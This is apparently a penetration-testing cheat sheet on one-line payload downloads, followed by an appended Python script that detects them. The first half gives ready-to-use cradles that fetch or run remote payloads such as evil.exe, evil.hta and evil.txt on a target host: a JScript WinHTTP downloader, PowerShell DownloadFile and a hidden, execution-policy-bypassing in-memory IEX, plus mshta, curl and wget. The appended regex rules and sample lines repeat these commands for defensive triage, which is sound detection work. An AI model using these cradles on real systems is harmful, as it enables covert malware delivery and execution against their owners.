One-line JS payload download
Every version of Windows supports JS out of the box, and it can be run through cscript to fetch a payload.

```javascript
// Fetch the URL passed as the first script argument with WinHTTP (synchronous request)
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();

// ADODB.Stream in binary mode (Type = 1) writes the raw response body to disk
var BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1;

BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("micropoor.exe");
```

```batch
C:\test>cscript /nologo dowfile2.js http://192.168.1.1/eval.exe
```

There is also the simplest PowerShell form:

```powershell
powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:\robots.txt')
```

Remote command execution with nothing written to disk:

```powershell
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.174.1:1234/evil.txt'))"
```

Running the following command on the remote target host downloads and executes, with nothing written to disk:

```batch
mshta http://192.168.174.1:1234/evil.hta
```

curl

```shell
curl http://192.168.174.1:1234/evil.exe -o evil.exe
```

wget

```shell
wget http://192.168.174.1:1234/evil.sh
```
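As an added, defender-side example that is not part of the original post: a small Python triage routine that flags process-creation command lines (the CommandLine field of Sysmon Event ID 1 or Windows 4688) matching the download cradles listed above. The rule names and the sample command lines are constructed for illustration.

```python
import re

# Constructed sample command lines, not real telemetry. The first five mirror the
# one-liners on this page; the last two are benign look-alikes that must not fire.
SAMPLE_CMDLINES = [
    r"cscript /nologo dowfile2.js http://192.168.1.1/eval.exe",
    r"powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:\robots.txt')",
    '''powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.174.1:1234/evil.txt'))"''',
    r"mshta http://192.168.174.1:1234/evil.hta",
    r"curl http://192.168.174.1:1234/evil.exe -o evil.exe",
    r"cscript /nologo C:\Scripts\inventory.js",
    r"powershell -c Get-Process",
]

URL_RE = re.compile(r"https?://[^\s'\"(),]+", re.IGNORECASE)

# Each rule is (name, regex); hits are returned in this order.
RULES = [
    ("script-host-remote-url", re.compile(r"\b[cw]script(\.exe)?\b.*https?://", re.I)),
    ("powershell-webclient-download", re.compile(r"\bpowershell(\.exe)?\b.*\.download(file|string)\s*\(", re.I)),
    ("powershell-in-memory-iex", re.compile(r"\bpowershell(\.exe)?\b.*\b(iex|invoke-expression)\b", re.I)),
    ("powershell-evasion-flags", re.compile(r"\bpowershell(\.exe)?\b.*(-w(indowstyle)?\s+hidden|-exec(utionpolicy)?\s+bypass)", re.I)),
    ("mshta-remote-hta", re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I)),
    ("cli-downloader", re.compile(r"\b(curl|wget)(\.exe)?\b.*https?://", re.I)),
]

def classify(cmdline):
    """Return the names of every rule the command line matches (empty list if none)."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def extract_urls(cmdline):
    """Pull out remote URLs so the analyst can block or hunt on them."""
    return URL_RE.findall(cmdline)

def triage(cmdlines):
    """Map each suspicious command line to its rule hits and URLs; benign lines are dropped."""
    out = {}
    for line in cmdlines:
        hits = classify(line)
        if hits:
            out[line] = {"rules": hits, "urls": extract_urls(line)}
    return out

if __name__ == "__main__":
    for line, info in triage(SAMPLE_CMDLINES).items():
        print(info["rules"], info["urls"], "<-", line[:60])
```

The regexes key on the script host or downloader binary combined with a URL or download API, so a plain `cscript inventory.js` or `powershell -c Get-Process` is left alone.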